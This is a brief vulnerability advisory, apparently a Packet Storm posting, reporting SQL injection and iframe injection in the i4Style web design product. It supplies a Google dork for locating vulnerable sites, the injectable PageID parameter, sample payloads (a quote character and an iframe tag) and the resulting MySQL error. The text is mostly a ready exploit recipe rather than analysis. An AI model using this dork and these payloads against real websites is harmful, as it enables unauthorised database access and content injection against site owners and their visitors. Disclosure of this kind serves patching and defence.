i4Style Web Design suffer from remote SQL injection and cross site scripting vulnerabilities.
1c38a500e4e3bdab6965199201e8033eaa702be19dfcba11c26c7d32d01d9ef3################################################################
[+] Title : i4Style web design SQL Injection / IFrame Injection
[+] Author : AngelParrot
[+] Vendor : http://i4style.com/
[+] Google Dork : inurl:webpage.php?PageID= "i4Style"
################################################################
[+] Exploit
- http://example.com/webpage.php?PageID=[SQL]
- http://example.com/webpage.php?PageID=[IFrame]
[+] Example
- http://example.com/webpage.php?PageID=1'
- http://example.com/webpage.php?PageID=<iframe src="http://google.com"></iframe>
[+] Error Message
- You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version
for the right syntax to use near '\' ORDER BY t.PageID, t2.ParaNo' at line 1
End
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed